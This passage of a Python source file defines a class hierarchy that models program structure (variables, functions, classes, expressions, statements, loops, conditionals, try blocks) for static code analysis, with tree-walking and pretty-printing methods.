constructor for code objects. Args: scope (CodeEntity): The program scope where this object belongs. parent (CodeEntity): This object's parent in the program tree. """ self.scope = scope self.parent = parent self.file = None self.line = None self.column = None def walk_preorder(self): """Iterates the program tree starting from this object, going down.""" yield self for child in self._children(): for descendant in child.walk_preorder(): yield descendant def filter(self, cls, recursive=False): """Retrieves all descendants (including self) that are instances of a given class. Args: cls (class): The class to use as a filter. Kwargs: recursive (bool): Whether to descend recursively down the tree. """ source = self.walk_preorder if recursive else self._children return [ codeobj for codeobj in source() if isinstance(codeobj, cls) ] def _afterpass(self): """Finalizes the construction of a code entity.""" pass def _validity_check(self): """Check whether this object is a valid construct.""" return True def _children(self): """Yield all direct children of this object.""" # The default implementation has no children, and thus should return # an empty iterator. return iter(()) def _lookup_parent(self, cls): """Lookup a transitive parent object that is an instance of a given class.""" codeobj = self.parent while codeobj is not None and not isinstance(codeobj, cls): codeobj = codeobj.parent return codeobj def pretty_str(self, indent=0): """Return a human-readable string representation of this object. Kwargs: indent (int): The amount of spaces to use as indentation. """ return (' ' * indent) + self.__str__() def ast_str(self, indent=0): """Return a minimal string to print a tree-like structure. Kwargs: indent (int): The number of indentation levels. 
""" line = self.line or 0 col = self.column or 0 name = type(self).__name__ spell = getattr(self, 'name', '[no spelling]') result = ' ({})'.format(self.result) if hasattr(self, 'result') else '' prefix = indent * '| ' return '{}[{}:{}] {}{}: {}'.format(prefix, line, col, name, result, spell) def __str__(self): """Return a string representation of this object.""" return self.__repr__() def __repr__(self): """Return a string representation of this object.""" return '[unknown]' class CodeStatementGroup(object): """This class is meant to provide common utility methods for objects that group multiple program statements together (e.g. functions, code blocks). It is not meant to be instantiated directly, only used for inheritance purposes. It defines the length of a statement group, and provides methods for integer-based indexing of program statements (as if using a list). """ def statement(self, i): """Return the *i*-th statement from the object's `body`.""" return self.body.statement(i) def statement_after(self, i): """Return the statement after the *i*-th one, or `None`.""" try: return self.statement(i + 1) except IndexError as e: return None def __getitem__(self, i): """Return the *i*-th statement from the object's `body`.""" return self.statement(i) def __len__(self): """Return the length of the statement group.""" return len(self.body) # ----- Common Entities ------------------------------------------------------- class CodeVariable(CodeEntity): """This class represents a program variable. A variable typically has a name, a type (`result`) and a value (or `None` for variables without a value or when the value is unknown). Additionally, a variable has an `id` which uniquely identifies it in the program (useful to resolve references), a list of references to it and a list of statements that write new values to the variable. If the variable is a *member*/*field*/*attribute* of an object, `member_of` should contain a reference to such object, instead of `None`. """ def __init__(self, scope, parent, id, name, result): """Constructor for variables. Args: scope (CodeEntity): The program scope where this object belongs. parent (CodeEntity): This object's parent in the program tree. id: An unique identifier for this variable. name (str): The name of the variable in the program. result (str): The type of the variable in the program. """ CodeEntity.__init__(self, scope, parent) self.id = id self.name = name self.result = result self.value = None self.member_of = None self.references = [] self.writes = [] @property def is_definition(self): return True @property def is_local(self): """Whether this is a local variable. In general, a variable is *local* if its containing scope is a statement (e.g. a block), or a function, given that the variable is not one of the function's parameters. """ return (isinstance(self.scope, CodeStatement) or (isinstance(self.scope, CodeFunction) and self not in self.scope.parameters)) @property def is_global(self): """Whether this is a global variable. In general, a variable is *global* if it is declared directly under the program's global scope or a namespace. 
""" return isinstance(self.scope, (CodeGlobalScope, CodeNamespace)) @property def is_parameter(self): """Whether this is a function parameter.""" return (isinstance(self.scope, CodeFunction) and self in self.scope.parameters) @property def is_member(self): """Whether this is a member/attribute of a class or object.""" return isinstance(self.scope, CodeClass) def _add(self, codeobj): """Add a child (value) to this object.""" assert isinstance(codeobj, CodeExpression.TYPES) self.value = codeobj def _children(self): """Yield all direct children of this object.""" if isinstance(self.value, CodeEntity): yield self.value def pretty_str(self, indent=0): """Return a human-readable string representation of this object. Kwargs: indent (int): The amount of spaces to use as indentation. """ return '{}{} {} = {}'.format(' ' * indent, self.result, self.name, pretty_str(self.value)) def __repr__(self): """Return a string representation of this object.""" return '[{}] {} = ({})'.format(self.result, self.name, self.value) class CodeFunction(CodeEntity, CodeStatementGroup): """This class represents a program function. A function typically has a name, a return type (`result`), a list of parameters and a body (a code block). It also has an unique `id` that identifies it in the program and a list of references to it. If a function is a method of some class, its `member_of` should be set to the corresponding class. """ def __init__(self, scope, parent, id, name, result, definition=True): """Constructor for functions. Args: scope (CodeEntity): The program scope where this object belongs. parent (CodeEntity): This object's parent in the program tree. id: An unique identifier for this function. name (str): The name of the function in the program. result (str): The return type of the function in the program. """ CodeEntity.__init__(self, scope, parent) self.id = id self.name = name self.result = result self.parameters = [] self.body = CodeBlock(self, self, explicit=True) self.member_of = None self.references = [] self._definition = self if definition else None @property def is_definition(self): """Whether this is a function definition or just a declaration.""" return self._definition is self @property def is_constructor(self): """Whether this function is a class constructor.""" return self.member_of is not None def _add(self, codeobj): """Add a child (statement) to this object.""" assert isinstance(codeobj, (CodeStatement, CodeExpression)) self.body._add(codeobj) def _children(self): """Yield all direct children of this object.""" for codeobj in self.parameters: yield codeobj for codeobj in self.body._children(): yield codeobj def _afterpass(self): """Assign a function-local index to each child object and register write operations to variables. This should only be called after the object is fully built. """ if hasattr(self, '_fi'): return fi = 0 for codeobj in self.walk_preorder(): codeobj._fi = fi fi += 1 if isinstance(codeobj, CodeOperator) and codeobj.is_assignment: if codeobj.arguments and isinstance(codeobj.arguments[0], CodeReference): var = codeobj.arguments[0].reference if isinstance(var, CodeVariable): var.writes.append(codeobj) def pretty_str(self, indent=0): """Return a human-readable string representation of this object. Kwargs: indent (int): The amount of spaces to use as indentation. 
""" spaces = ' ' * indent params = ', '.join(map(lambda p: p.result + ' ' + p.name, self.parameters)) if self.is_constructor: pretty = '{}{}({}):\n'.format(spaces, self.name, params) else: pretty = '{}{} {}({}):\n'.format(spaces, self.result, self.name, params) if self._definition is not self: pretty += spaces + ' [declaration]' else: pretty += self.body.pretty_str(indent + 2) return pretty def __repr__(self): """Return a string representation of this object.""" params = ', '.join(map(str, self.parameters)) return '[{}] {}({})'.format(self.result, self.name, params) class CodeClass(CodeEntity): """This class represents a program class for object-oriented languages. A class typically has a name, an unique `id`, a list of members (variables, functions), a list of superclasses, and a list of references. If a class is defined within another class (inner class), it should have its `member_of` set to the corresponding class. """ def __init__(self, scope, parent, id_, name, definition=True): """Constructor for classes. Args: scope (CodeEntity): The program scope where this object belongs. parent (CodeEntity): This object's parent in the program tree. id: An unique identifier for this class. name (str): The name of the class in the program. """ CodeEntity.__init__(self, scope, parent) self.id = id_ self.name = name self.members = [] self.superclasses = [] self.member_of = None self.references = [] self._definition = self if definition else None @property def is_definition(self): """Whether this is a definition or a declaration of the class.""" return self._definition is self def _add(self, codeobj): """Add a child (function, variable, class) to this object.""" assert isinstance(codeobj, (CodeFunction, CodeVariable, CodeClass)) self.members.append(codeobj) codeobj.member_of = self def _children(self): """Yield all direct children of this object.""" for codeobj in self.members: yield codeobj def _afterpass(self): """Assign the `member_of` of child members and call their `_afterpass()`. This should only be called after the object is fully built. """ for codeobj in self.members: if not codeobj.is_definition: if not codeobj._definition is None: codeobj._definition.member_of = self codeobj._afterpass() def pretty_str(self, indent=0): """Return a human-readable string representation of this object. Kwargs: indent (int): The amount of spaces to use as indentation. """ spaces = ' ' * indent pretty = spaces + 'class ' + self.name if self.superclasses: superclasses = ', '.join(self.superclasses) pretty += '(' + superclasses + ')' pretty += ':\n' if self.members: pretty += '\n\n'.join( c.pretty_str(indent + 2) for c in self.members ) else: pretty += spaces + ' [declaration]' return pretty def __repr__(self): """Return a string representation of this object.""" return '[class {}]'.format(self.name) class CodeNamespace(CodeEntity): """This class represents a program namespace. A namespace is a concept that is explicit in languages such as C++, but less explicit in many others. In Python, the closest thing should be a module. In Java, it may be the same as a class, or non-existent. A namespace typically has a name and a list of children objects (variables, functions or classes). """ def __init__(self, scope, parent, name): """Constructor for namespaces. Args: scope (CodeEntity): The program scope where this object belongs. parent (CodeEntity): This object's parent in the program tree. name (str): The name of the namespace in the program. 
""" CodeEntity.__init__(self, scope, parent) self.name = name self.children = [] def _add(self, codeobj): """Add a child (namespace, function, variable, class) to this object.""" assert isinstance(codeobj, (CodeNamespace, CodeClass, CodeFunction, CodeVariable)) self.children.append(codeobj) def _children(self): """Yield all direct children of this object.""" for codeobj in self.children: yield codeobj def _afterpass(self): """Call the `_afterpass()` of child objects. This should only be called after the object is fully built. """ for codeobj in self.children: codeobj._afterpass() def pretty_str(self, indent=0): """Return a human-readable string representation of this object. Kwargs: indent (int): The amount of spaces to use as indentation. """ spaces = ' ' * indent pretty = '{}namespace {}:\n'.format(spaces, self.name) pretty += '\n\n'.join(c.pretty_str(indent + 2) for c in self.children) return pretty def __repr__(self): """Return a string representation of this object.""" return '[namespace {}]'.format(self.name) class CodeGlobalScope(CodeEntity): """This class represents the global scope of a program. The global scope is the root object of a program. If there are no better candidates, it is the `scope` and `parent` of all other objects. It is also the only object that does not have a `scope` or `parent`. """ def __init__(self): """Constructor for global scope objects.""" CodeEntity.__init__(self, None, None) self.children = [] def _add(self, codeobj): """Add a child (namespace, function, variable, class) to this object.""" assert isinstance(codeobj, (CodeNamespace, CodeClass, CodeFunction, CodeVariable)) self.children.append(codeobj) def _children(self): """Yield all direct children of this object.""" for codeobj in self.children: yield codeobj def _afterpass(self): """Call the `_afterpass()` of child objects. This should only be called after the object is fully built. """ for codeobj in self.children: codeobj._afterpass() def pretty_str(self, indent=0): """Return a human-readable string representation of this object. Kwargs: indent (int): The amount of spaces to use as indentation. """ return '\n\n'.join( codeobj.pretty_str(indent=indent) for codeobj in self.children ) # ----- Expression Entities --------------------------------------------------- class CodeExpression(CodeEntity): """Base class for expressions within a program. Expressions can be of many types, including literal values, operators, references and function calls. This class is meant to be inherited from, and not instantiated directly. An expression typically has a name (e.g. the name of the function in a function call) and a type (`result`). Also, an expression should indicate whether it is enclosed in parentheses. """ def __init__(self, scope, parent, name, result, paren=False): """Constructor for expressions. Args: scope (CodeEntity): The program scope where this object belongs. parent (CodeEntity): This object's parent in the program tree. name (str): The name of the expression in the program. result (str): The return type of the expression in the program. Kwargs: paren (bool): Whether the expression is enclosed in parentheses. 
""" CodeEntity.__init__(self, scope, parent) self.name = name self.result = result self.parenthesis = paren @property def function(self): """The function where this expression occurs.""" return self._lookup_parent(CodeFunction) @property def statement(self): """The statement where this expression occurs.""" return self._lookup_parent(CodeStatement) def pretty_str(self, indent=0): """Return a human-readable string representation of this object. Kwargs: indent (int): The amount of spaces to use as indentation. """ if self.parenthesis: return (' ' * indent) + '(' + self.name + ')' return (' ' * indent) + self.name def __repr__(self): """Return a string representation of this object.""" return '[{}] {}'.format(self.result, self.name) class SomeValue(CodeExpression): """This class represents an unknown value for diverse primitive types.""" def __init__(self, result): """Constructor for unknown values.""" CodeExpression.__init__(self, None, None, result, result) def _children(self): """Yield all the children of this object, that is no children.""" return iter(()) SomeValue.INTEGER = SomeValue("int") SomeValue.FLOATING = SomeValue("float") SomeValue.CHARACTER = SomeValue("char") SomeValue.STRING = SomeValue("string") SomeValue.BOOL = SomeValue("bool") class CodeLiteral(CodeExpression): """Base class for literal types not present in Python. This class is meant to represent a literal whose type is not numeric, string or boolean, as bare Python literals are used for those. A literal has a value (e.g. a list `[1, 2, 3]`) and a type (`result`), and could be enclosed in parentheses. It does not have a name. """ def __init__(self, scope, parent, value, result, paren=False): """Constructor for literals. As literals have no name, a constant string is used instead. Args: scope (CodeEntity): The program scope where this object belongs. parent (CodeEntity): This object's parent in the program tree. value (CodeExpression|CodeExpression[]): This literal's value. result (str): The return type of the literal in the program. Kwargs: paren (bool): Whether the literal is enclosed in parentheses. """ CodeExpression.__init__(self, scope, parent, 'literal', result, paren) self.value = value def pretty_str(self, indent=0): """Return a human-readable string representation of this object. Kwargs: indent (int): The amount of spaces to use as indentation. """ if self.parenthesis: return '{}({})'.format(' ' * indent, pretty_str(self.value)) return pretty_str(self.value, indent=indent) def __repr__(self): """Return a string representation of this object.""" return '[{}] {!r}'.format(self.result, self.value) CodeExpression.TYPES = (int, long, float, bool, basestring, SomeValue, CodeLiteral, CodeExpression) CodeExpression.LITERALS = (int, long, float, bool, basestring, CodeLiteral) class CodeNull(CodeLiteral): """This class represents an indefinite value. Many programming languages have their own version of this concept: Java has null references, C/C++ NULL pointers, Python None and so on. """ def __init__(self, scope, parent, paren=False): """Constructor for null literals. Args: scope (CodeEntity): The program scope where this object belongs. parent (CodeEntity): This object's parent in the program tree. Kwargs: paren (bool): Whether the null literal is enclosed in parentheses. """ CodeLiteral.__init__(self, scope, parent, None, 'null', paren) def _children(self): """Yield all the children of this object, that is no children. This class inherits from CodeLiteral just for consistency with the class hierarchy. 
It should have no children, thus an empty iterator is returned. """ return iter(()) class CodeCompositeLiteral(CodeLiteral): """This class represents a composite literal. A composite literal is any type of literal whose value is compound, rather than simple. An example present in many programming languages are list literals, often constructed as `[1, 2, 3]`. A composite literal has a sequence of values that compose it (`values`), a type (`result`), and it should indicate whether it is enclosed in parentheses. """ def __init__(self, scope, parent, result, value=(), paren=False): """Constructor for a compound literal. Args: scope (CodeEntity): The program scope where this object belongs. parent (CodeEntity): This object's parent in the program tree. value (iterable): The initial value sequence in this composition. result (str): The return type of the literal in the program. Kwargs: paren (bool): Whether the literal is enclosed in parentheses. """ try: value = list(value) except TypeError as te: raise AssertionError(str(te)) CodeLiteral.__init__(self, scope, parent, value, result, paren) @property def values(self): return tuple(self.value) def _add_value(self, child): """Add a value to the sequence in this composition.""" self.value.append(child) def _children(self): """Yield all direct children of this object.""" for value in self.value: if isinstance(value, CodeEntity): yield value def pretty_str(self, indent=0): """Return a human-readable string representation of this object. Kwargs: indent (int): The amount of spaces to use as indentation. """ indent = ' ' * indent values = '{{{}}}'.format(', '.join(map(pretty_str, self.value))) if self.parenthesis: return '{}({})'.format(indent, values) return '{}{}'.format(indent, values) def __repr__(self): """Return a string representation of this object.""" return '[{}] {{{}}}'.format(self.result, ', '.join(map(repr, self.value))) class CodeReference(CodeExpression): """This class represents a reference expression (e.g. to a variable). A reference typically has a name (of what it is referencing), and a return type. If the referenced entity is known, `reference` should be set. If the reference is a field/attribute of an object, `field_of` should be set to that object. """ def __init__(self, scope, parent, name, result, paren=False): """Constructor for references. Args: scope (CodeEntity): The program scope where this object belongs. parent (CodeEntity): This object's parent in the program tree. name (str): The name of the reference in the program. result (str): The return type of the expression in the program. Kwargs: paren (bool): Whether the reference is enclosed in parentheses. """ CodeExpression.__init__(self, scope, parent, name, result, paren) self.field_of = None self.reference = None def _set_field(self, codeobj): """Set the object that contains the attribute this is a reference of.""" assert isinstance(codeobj, CodeExpression) self.field_of = codeobj def _children(self): """Yield all direct children of this object.""" if self.field_of: yield self.field_of def pretty_str(self, indent=0): """Return a human-readable string representation of this object. Kwargs: indent (int): The amount of spaces to use as indentation. 
""" spaces = ' ' * indent pretty = '{}({})' if self.parenthesis else '{}{}' name = ('{}.{}'.format(self.field_of.pretty_str(), self.name) if self.field_of else self.name) return pretty.format(spaces, name) def __str__(self): """Return a string representation of this object.""" return '#' + self.name def __repr__(self): """Return a string representation of this object.""" if self.field_of: return '[{}] ({}).{}'.format(self.result, self.field_of, self.name) return '[{}] #{}'.format(self.result, self.name) class CodeOperator(CodeExpression): """This class represents an operator expression (e.g. `a + b`). Operators can be unary or binary, and often return numbers or booleans. Some languages also support ternary operators. Do note that assignments are often considered expressions, and, as such, assignment operators are included here. An operator typically has a name (its token), a return type, and a tuple of its arguments. """ _UNARY_TOKENS = ("+", "-") _BINARY_TOKENS = ("+", "-", "*", "/", "%", "<", ">", "<=", ">=", "==", "!=", "&&", "||", "=") def __init__(self, scope, parent, name, result, args=None, paren=False): """Constructor for operators. Args: scope (CodeEntity): The program scope where this object belongs. parent (CodeEntity): This object's parent in the program tree. name (str): The name of the operator in the program. result (str): The return type of the operator in the program. Kwargs: args (tuple): Initial tuple of arguments. paren (bool): Whether the expression is enclosed in parentheses. """ CodeExpression.__init__(self, scope, parent, name, result, paren) self.arguments = args or () @property def is_unary(self): """Whether this is a unary operator.""" return len(self.arguments) == 1 @property def is_binary(self): """Whether this is a binary operator.""" return len(self.arguments) == 2 @property def is_ternary(self): """Whether this is a ternary operator.""" return len(self.arguments) == 3 @property def is_assignment(self): """Whether this is an assignment operator.""" return self.name == "=" def _add(self, codeobj): """Add a child (argument) to this object.""" assert isinstance(codeobj, CodeExpression.TYPES) self.arguments = self.arguments + (codeobj,) def _children(self): """Yield all direct children of this object.""" for codeobj in self.arguments: if isinstance(codeobj, CodeExpression): yield codeobj def pretty_str(self, indent=0): """Return a human-readable string representation of this object. Kwargs: indent (int): The amount of spaces to use as indentation. """ indent = ' ' * indent pretty = '{}({})' if self.parenthesis else '{}{}' if self.is_unary: operator = self.name + pretty_str(self.arguments[0]) else: operator = '{} {} {}'.format(pretty_str(self.arguments[0]), self.name, pretty_str(self.arguments[1])) return pretty.format(indent, operator) def __repr__(self): """Return a string representation of this object.""" if self.is_unary: return '[{}] {}({})'.format(self.result, self.name, self.arguments[0]) if self.is_binary: return '[{}] ({}){}({})'.format(self.result, self.arguments[0], self.name, self.arguments[1]) return '[{}] {}'.format(self.result, self.name) class CodeFunctionCall(CodeExpression): """This class represents a function call. A function call typically has a name (of the called function), a return type, a tuple of its arguments and a reference to the called function. If a call references a class method, its `method_of` should be set to the object on which a method is being called. 
""" def __init__(self, scope, parent, name, result, paren=False): """Constructor for function calls. Args: scope (CodeEntity): The program scope where this object belongs. parent (CodeEntity): This object's parent in the program tree. name (str): The name of the function in the program. result (str): The return type of the expression in the program. Kwargs: paren (bool): Whether the expression is enclosed in parentheses. """ CodeExpression.__init__(self, scope, parent, name, result, paren) self.full_name = name self.arguments = () self.method_of = None self.reference = None @property def is_constructor(self): """Whether the called function is a constructor.""" return self.result == self.name def _add(self, codeobj): """Add a child (argument) to this object.""" assert isinstance(codeobj, CodeExpression.TYPES) self.arguments = self.arguments + (codeobj,) def _set_method(self, codeobj): """Set the object on which a method is called.""" assert isinstance(codeobj, CodeExpression) self.method_of = codeobj def _children(self): """Yield all direct children of this object.""" if self.method_of: yield self.method_of for codeobj in self.arguments: if isinstance(codeobj, CodeExpression): yield codeobj def pretty_str(self, indent=0): """Return a human-readable string representation of this object. Kwargs: indent (int): The amount of spaces to use as indentation. """ indent = ' ' * indent pretty = '{}({})' if self.parenthesis else '{}{}' args = ', '.join(map(pretty_str, self.arguments)) if self.method_of: call = '{}.{}({})'.format(self.method_of.pretty_str(), self.name, args) elif self.is_constructor: call = 'new {}({})'.format(self.name, args) else: call = '{}({})'.format(self.name, args) return pretty.format(indent, call) def __repr__(self): """Return a string representation of this object.""" args = ', '.join(map(str, self.arguments)) if self.is_constructor: return '[{}] new {}({})'.format(self.result, self.name, args) if self.method_of: return '[{}] {}.{}({})'.format(self.result, self.method_of.name, self.name, args) return '[{}] {}({})'.format(self.result, self.name, args) class CodeDefaultArgument(CodeExpression): """This class represents a default argument. Some languages, such as C++, allow function parameters to have default values when not explicitly provided by the programmer. This class represents such omitted arguments. A default argument has only a return type. """ def __init__(self, scope, parent, result): """Constructor for default arguments. Args: scope (CodeEntity): The program scope where this object belongs. parent (CodeEntity): This object's parent in the program tree. result (str): The return type of the argument in the program. """ CodeExpression.__init__(self, scope, parent, '(default)', result) # ----- Statement Entities ---------------------------------------------------- class CodeStatement(CodeEntity): """Base class for program statements. Programming languages often define diverse types of statements (e.g. return statements, control flow, etc.). This class provides common functionality for such statements. In many languages, statements must be contained within a function. An operator typically has a name (its token), a return type, and a tuple of its arguments. """ def __init__(self, scope, parent): """Constructor for statements. Args: scope (CodeEntity): The program scope where this object belongs. parent (CodeEntity): This object's parent in the program tree. 
""" CodeEntity.__init__(self, scope, parent) self._si = -1 @property def function(self): """The function where this statement appears in.""" return self._lookup_parent(CodeFunction) class CodeJumpStatement(CodeStatement): """This class represents a jump statement (e.g. `return`, `break`). A jump statement has a name. In some cases, it may also have an associated value (e.g. `return 0`). """ def __init__(self, scope, parent, name): """Constructor for jump statements. Args: scope (CodeEntity): The program scope where this object belongs. parent (CodeEntity): This object's parent in the program tree. name (str): The name of the statement in the program. """ CodeStatement.__init__(self, scope, parent) self.name = name self.value = None def _add(self, codeobj): """Add a child (value) to this object.""" assert isinstance(codeobj, CodeExpression.TYPES) self.value = codeobj def _children(self): """Yield all direct children of this object.""" if isinstance(self.value, CodeExpression): yield self.value def pretty_str(self, indent=0): """Return a human-readable string representation of this object. Kwargs: indent (int): The amount of spaces to use as indentation. """ indent = ' ' * indent if self.value is not None: return '{}{} {}'.format(indent, self.name, pretty_str(self.value)) return indent + self.name def __repr__(self): """Return a string representation of this object.""" if self.value is not None: return '{} {}'.format(self.name, str(self.value)) return self.name class CodeExpressionStatement(CodeStatement): """This class represents an expression statement. It is only a wrapper. Many programming languages allow expressions to be statements on their own. A common example is the assignment operator, which can be a statement on its own, but also returns a value when contained within a larger expression. """ def __init__(self, scope, parent, expression=None): """Constructor for expression statements. Args: scope (CodeEntity): The program scope where this object belongs. parent (CodeEntity): This object's parent in the program tree. Kwargs: expression (CodeExpression): The expression of this statement. """ CodeStatement.__init__(self, scope, parent) self.expression = expression def _children(self): """Yield all direct children of this object.""" if isinstance(self.expression, CodeExpression): yield self.expression def pretty_str(self, indent=0): """Return a human-readable string representation of this object. Kwargs: indent (int): The amount of spaces to use as indentation. """ return pretty_str(self.expression, indent=indent) def __repr__(self): """Return a string representation of this object.""" return repr(self.expression) class CodeBlock(CodeStatement, CodeStatementGroup): """This class represents a code block (e.g. `{}` in C, C++, Java, etc.). Blocks are little more than collections of statements, while being considered a statement themselves. Some languages allow blocks to be implicit in some contexts, e.g. an `if` statement omitting curly braces in C, C++, Java, etc. This model assumes that control flow branches and functions always have a block as their body. """ def __init__(self, scope, parent, explicit=True): """Constructor for code blocks. Args: scope (CodeEntity): The program scope where this object belongs. parent (CodeEntity): This object's parent in the program tree. Kwargs: explicit (bool): Whether the block is explicit in the code. 
""" CodeStatement.__init__(self, scope, parent) self.body = [] self.explicit = explicit def statement(self, i): """Return the *i*-th statement of this block.""" return self.body[i] def _add(self, codeobj): """Add a child (statement) to this object.""" assert isinstance(codeobj, CodeStatement) codeobj._si = len(self.body) self.body.append(codeobj) def _children(self): """Yield all direct children of this object.""" for codeobj in self.body: yield codeobj def pretty_str(self, indent=0): """Return a human-readable string representation of this object. Kwargs: indent (int): The amount of spaces to use as indentation. """ if self.body: return '\n'.join(stmt.pretty_str(indent) for stmt in self.body) else: return (' ' * indent) + '[empty]' def __repr__(self): """Return a string representation of this object.""" return str(self.body) class CodeDeclaration(CodeStatement): """This class represents a declaration statement. Some languages, such as C, C++ or Java, consider this special kind of statement for declaring variables within a function, for instance. A declaration statement contains a list of all declared variables. """ def __init__(self, scope, parent): """Constructor for declaration statements. Args: scope (CodeEntity): The program scope where this object belongs. parent (CodeEntity): This object's parent in the program tree. """ CodeStatement.__init__(self, scope, parent) self.variables = [] def _add(self, codeobj): """Add a child (variable) to this object.""" assert isinstance(codeobj, CodeVariable) self.variables.append(codeobj) def _children(self): """Yield all direct children of this object.""" for codeobj in self.variables: yield codeobj def pretty_str(self, indent=0): """Return a human-readable string representation of this object. Kwargs: indent (int): The amount of spaces to use as indentation. """ spaces = ' ' * indent return spaces + ', '.join(v.pretty_str() for v in self.variables) def __repr__(self): """Return a string representation of this object.""" return str(self.variables) class CodeControlFlow(CodeStatement, CodeStatementGroup): """Base class for control flow structures (e.g. `for` loops). Control flow statements are assumed to have, at least, one branch (a boolean condition and a `CodeBlock` that is executed when the condition is met). Specific implementations may consider more branches, or default branches (executed when no condition is met). A control flow statement typically has a name. """ def __init__(self, scope, parent, name): """Constructor for control flow structures. Args: scope (CodeEntity): The program scope where this object belongs. parent (CodeEntity): This object's parent in the program tree. name (str): The name of the control flow statement in the program. 
""" CodeStatement.__init__(self, scope, parent) self.name = name self.condition = True self.body = CodeBlock(scope, self, explicit=False) def get_branches(self): """Return a list of branches, where each branch is a pair of condition and respective body.""" return [(self.condition, self.body)] def _set_condition(self, condition): """Set the condition for this control flow structure.""" assert isinstance(condition, CodeExpression.TYPES) self.condition = condition def _set_body(self, body): """Set the main body for this control flow structure.""" assert isinstance(body, CodeStatement) if isinstance(body, CodeBlock): self.body = body else: self.body._add(body) def _children(self): """Yield all direct children of this object.""" if isinstance(self.condition, CodeExpression): yield self.condition for codeobj in self.body._children(): yield codeobj def __repr__(self): """Return a string representation of this object.""" return '{} {}'.format(self.name, self.get_branches()) class CodeConditional(CodeControlFlow): """This class represents a conditional (`if`). A conditional is allowed to have a default branch (the `else` branch), besides its mandatory one. """ def __init__(self, scope, parent): """Constructor for conditionals. Args: scope (CodeEntity): The program scope where this object belongs. parent (CodeEntity): This object's parent in the program tree. """ CodeControlFlow.__init__(self, scope, parent, 'if') self.else_body = CodeBlock(scope, self, explicit=False) @property def then_branch(self): """The branch associated with a condition.""" return self.condition, self.body @property def else_branch(self): """The default branch of the conditional.""" return True, self.else_body def statement(self, i): """Return the *i*-th statement of this block. Behaves as if the *then* and *else* branches were concatenated, for indexing purposes. """ # ----- This code is just to avoid creating a new list and # returning a custom exception message. o = len(self.body) n = o + len(self.else_body) if i >= 0 and i < n: if i < o: return self.body.statement(i) return self.else_body.statement(i - o) elif i < 0 and i >= -n: if i >= o - n: return self.else_body.statement(i) return self.body.statement(i - o + n) raise IndexError('statement index out of range') def statement_after(self, i): """Return the statement after the *i*-th one, or `None`.""" k = i + 1 o = len(self.body) n = o + len(self.else_body) if k > 0: if k < o: return self.body.statement(k) if k > o and k < n: return self.else_body.statement(k) if k < 0: if k < o - n and k > -n: return self.body.statement(k) if k > o - n: return self.else_body.statement(k) return None def get_branches(self): """Return a list with the conditional branch and the default branch.""" if self.else_branch: return [self.then_branch, self.else_branch] return [self.then_branch] def _add_default_branch(self, body): """Add a default body for this conditional (the `else` branch).""" assert isinstance(body, CodeStatement) if isinstance(body, CodeBlock): self.else_body = body else: self.else_body._add(body) def __len__(self): """Return the length of both branches combined.""" return len(self.body) + len(self.else_body) def _children(self): """Yield all direct children of this object.""" if isinstance(self.condition, CodeExpression): yield self.condition for codeobj in self.body._children(): yield codeobj for codeobj in self.else_body._children(): yield codeobj def pretty_str(self, indent=0): """Return a human-readable string representation of this object. 
Kwargs: indent (int): The amount of spaces to use as indentation. """ spaces = ' ' * indent condition = pretty_str(self.condition) pretty = '{}if ({}):\n'.format(spaces, condition) pretty += self.body.pretty_str(indent=indent + 2) if self.else_body: pretty += '\n{}else:\n'.format(spaces) pretty += self.else_body.pretty_str(indent=indent + 2) return pretty class CodeLoop(CodeControlFlow): """This class represents a loop (e.g. `while`, `for`). Some languages allow loops to define local declarations, as well as an increment statement. A loop has only a single branch, its condition plus the body that should be repeated while the condition holds. """ def __init__(self, scope, parent, name): """Constructor for loops. Args: scope (CodeEntity): The program scope where this object belongs. parent (CodeEntity): This object's parent in the program tree. name (str): The name of the loop statement in the program. """ CodeControlFlow.__init__(self, scope, parent, name) self.declarations = None self.increment = None def _set_declarations(self, declarations): """Set declarations local to this loop (e.g. `for` variables).""" assert isinstance(declarations, CodeStatement) self.declarations = declarations declarations.scope = self.body def _set_increment(self, statement): """Set the increment statement for this loop (e.g. in a `for`).""" assert isinstance(statement, CodeStatement) self.increment = statement statement.scope = self.body def _children(self): """Yield all direct children of this object.""" if self.declarations: yield self.declarations if isinstance(self.condition, CodeExpression): yield self.condition if self.increment: yield self.increment for codeobj in self.body._children(): yield codeobj def pretty_str(self, indent=0): """Return a human-readable string representation of this object. Kwargs: indent (int): The amount of spaces to use as indentation. """ spaces = ' ' * indent condition = pretty_str(self.condition) v = self.declarations.pretty_str() if self.declarations else '' i = self.increment.pretty_str(indent=1) if self.increment else '' pretty = '{}for ({}; {}; {}):\n'.format(spaces, v, condition, i) pretty += self.body.pretty_str(indent=indent + 2) return pretty class CodeSwitch(CodeControlFlow): """This class represents a switch statement. A switch evaluates a value (its `condition`) and then declares at least one branch (*cases*) that execute when the evaluated value is equal to the branch value. It may also have a default branch. Switches are often one of the most complex constructs of programming languages, so this implementation might be lackluster. """ def __init__(self, scope, parent): """Constructor for switches. Args: scope (CodeEntity): The program scope where this object belongs. parent (CodeEntity): This object's parent in the program tree. """ CodeControlFlow.__init__(self, scope, parent, "switch") self.cases = [] self.default_case = None def _add_branch(self, value, statement): """Add a branch/case (value and statement) to this switch.""" self.cases.append((value, statement)) def _add_default_branch(self, statement): """Add a default branch to this switch.""" self.default_case = statement def pretty_str(self, indent=0): """Return a human-readable string representation of this object. Kwargs: indent (int): The amount of spaces to use as indentation. 
""" spaces = ' ' * indent condition = pretty_str(self.condition) pretty = '{}switch ({}):\n'.format(spaces, condition) pretty += self.body.pretty_str(indent=indent + 2) return pretty class CodeTryBlock(CodeStatement, CodeStatementGroup): """This class represents a try-catch block statement. `try` blocks have a main body of statements, just like regular blocks. Multiple `catch` blocks may be defined to handle specific types of exceptions. Some languages also allow a `finally` block that is executed after the other blocks (either the `try` block, or a `catch` block, when an exception is raised and handled). """ def __init__(self, scope, parent): """Constructor for try block structures. Args: scope (CodeEntity): The program scope where this object belongs. parent (CodeEntity): This object's parent in the program tree. """ CodeStatement.__init__(self, scope, parent) self.body = CodeBlock(scope, self, explicit=True) self.catches = [] self.finally_body = CodeBlock(scope, self, explicit=True) def _set_body(self, body): """Set the main body for try block structure.""" assert isinstance(body, CodeBlock) self.body = body def _add_catch(self, catch_block): """Add a catch block (exception variable declaration and block) to this try block structure. """ assert isinstance(catch_block, self.CodeCatchBlock) self.catches.append(catch_block) def _set_finally_body(self, body): """Set the finally body for try block structure.""" assert isinstance(body, CodeBlock) self.finally_body = body def _children(self): """Yield all direct children of this object.""" for codeobj in self.body._children(): yield codeobj for catch_block in self.catches: for codeobj in catch_block._children(): yield codeobj for codeobj in self.finally_body._children(): yield codeobj def 